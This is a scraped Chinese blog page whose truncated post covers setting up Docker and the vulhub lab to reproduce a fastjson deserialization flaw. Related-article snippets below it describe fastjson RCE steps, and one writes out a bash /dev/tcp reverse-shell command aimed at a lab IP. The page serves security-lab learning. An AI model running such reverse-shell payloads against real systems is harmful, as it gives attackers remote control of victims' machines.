第一个docker漏洞环境搭建并复现某fastjson漏洞

最新推荐文章于 2024-07-22 17:41:09 发布
原创 最新推荐文章于 2024-07-22 17:41:09 发布 · 1.3k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #docker

docker漏洞环境搭建并复现某fastjson漏洞

补一个之前复现fastjson漏洞的记录,poc已有
1、搭建docker(mac版)
参考链接:https://www.runoob.com/docker/macos-docker-install.html
安装成功后进行初始化
在这里插入图片描述问题:发现80端口被占用
解决:https://blog.youkuaiyun.com/haha223545/article/details/105244919,是apache占用了,所以停止apache服务即可:sudo apachectl stop
在这里插入图片描述2、从git上拉取漏洞环境靶机vulhub(mac需要装好Git)
在这里插入图片描述进入后能看到有许多漏洞环境
在这里插入图片描述3、使用docker
进入对应的文件夹,使用docker-compose up

最低0.47元/天 解锁文章
JAVA 经常遇到一些问题【第一部分1~35】
A-MING的博客
06-01 9980
JAVA 经常遇到一些问题
fastjson jar包_Fastjson<=1.2.47反序列化漏洞复现
weixin_39864373的博客
11-30 283
实验环境攻击机C:Windows 10 企业版 LTSC靶机A:CentOS8 (公网)监听主机B:Centos7(公网)项目地址:https://github.com/vulhub/vulhub该篇复现环境fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供 基础环境搭建 在靶机A上安装dockercurl http...
Fastjson历史漏洞复现
懂进攻知防守
07-27 1872
fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。...
Fastjson 1.2.47 远程命令执行漏洞复现记录分享
qq_35361412的博客
07-16 1063
Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。
Fastjson反序列化漏洞
g1345444的博客
02-19 1255
下载地址:https://github.com/RandomRobbieBF/marshalsec-jar。下载地址:https://github.com/welk1n/JNDI-Injection-Exploit。下载地址:https://github.com/pmiaowu/BurpFastJsonScan。下载地址:https://github.com/a1phaboy/FastjsonScan。将TouchFile.java文件内容修改为以下代码。地址:http://www.dnslog.cn/
FastJson-fastjson的简单使用(alibaba)
weixin_34146805的博客
11-16 184
原文章:http://blog.youkuaiyun.com/glarystar/article/details/6654494 原作者:张星的博客 maven配置: &lt;dependency&gt; &lt;groupId&gt;com.alibaba&lt;/groupId&gt; &lt;artifactId&gt;fastjson&lt;/artifact...
Fastjson 1.2.24漏洞搭建复现——详解
网安小白的博客
08-02 1946
反序列化Fastjson1.2.24漏洞复现全过程,图文详解,包含复现过程中出现各种问题~
fastjson反序列化漏洞手把手复现
最新发布
潇逗
07-22 1467
需要登录网址 https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html ,选择自己需要的java版本下载。ngrok使用参考https://editor.youkuaiyun.com/md/?这里第135后面跟的4444端口是开启Http映射的时候设置的端口,后面的9999端口是我们rmi服务用来监听的端口。(1)官网下载 https://maven.apache.org/download.cgi。
fastjson漏洞复现
buffedon的博客
08-01 3136
fastjson漏洞复现fastjson漏洞原理简介靶机环境搭建漏洞探测发送一个错的数据包正确的数据包发送漏洞利用docker 搭建靶机编译恶意类启动HTTP服务启动rmi服务发送数据利用fastjson漏洞反弹shell fastjson漏洞原理简介 若lookup函数中的参数攻击者可控,便可以指向攻击者的服务器,即可实现JNDI注入实现任意代码执行。 原理(流程): 攻击者访问目标网站,通过burpsuite抓包,以json的格式添加 JdbcRowSetImpl 恶意类信息,发送给目标机。
Fastjson反序列化漏洞(靶场搭建复现
hovcfuti的博客
10-10 1807
首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,其次,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
利用docker搭建不同版本fastjson漏洞环境【保姆级教学】
Ciyaso的博客
06-26 2038
利用docker搭建不同版本的fastjson漏洞环境
fastjson使用
yangchuanan的博客
10-08 215
转载 https://www.cnblogs.com/cdf-opensource-007/p/7106018.html fastJson对于json格式字符串的解析主要用到了一下三个类: JSON:fastJson的解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换。 JSONObject:fastJson提供的json对象。 JSONArray:fastJson提...
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1502
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。且在Fastjson
Fastjson靶场
王嘟嘟的博客
02-14 1178
花了一点时间,搞了一个Fastjson的靶场,主要目的是为了测试payload,以及方便后来者做一些练习。
Fastjson 1.2.24漏洞搭建复现
yunshang_secure的博客
12-22 1425
Fastjson 1.2.24漏洞搭建复现
fastjson-1.2.24漏洞搭建复现,手把手图文教程
芜湖~米汤来喽~
10-04 1670
【代码】fastjson-1.2.24漏洞搭建复现,手把手图文教程。
每天了解一个漏洞——fastjson
qq_54030686的博客
01-19 4014
每天了解一个漏洞——fastjson 标志:param参数内容被fastjson调用解析,个人理解为参数通过json的形式返回,类似于{"a":"132","b":"456"}这种形式进行传递数据 危害:通过构造特殊的java类,实现命令执行,反弹shell等 利用局限:需要fastjson版本<=1.2.68 而且本机使用javac编译时,用的java版本和目标所用的版本不能相差过大 利用: 首先需要判断目标主机是否采用fastjson,可以将json数据去掉大括号,例如 {"a":"132","b
fastjson1.2.24 反序列化漏洞原理、环境搭建、利用图
Cwillchris的博客
03-17 774
6、目标机获取HackerFile文件内容执行,HackerFile文件包含反弹shenll命令(/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.3/5555 0>&1)1、kali(192.168.1.3)作为用户,访问目标机192.168.1.10:8090,提交恶意数据rmi://192.168.1.3:6666。抓包修改请求方法为POST,最下面空一行添加{"name":"Cwillchris", "age":20},即可更新服务端的信息。
老生常谈的fastjson安全问题,从实战深入反序列化漏洞原理
2201_75353421的博客
06-20 3280
反序列化是java安全er避不开的技能点,也是非常难的一个点。这里我就先从我实战中遇到最多也是自己最熟悉的fastjson开始,这个漏洞老生长谈了,不过只要遇到就真是一个很好的点了。这里我先从效果开始再转战到原理,因为如果不懂代码,上来就分析代码就会让人望而却步。直接从漏洞利用开始,溯源到原理反倒是我这种非安全研究er的最好学习方式。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值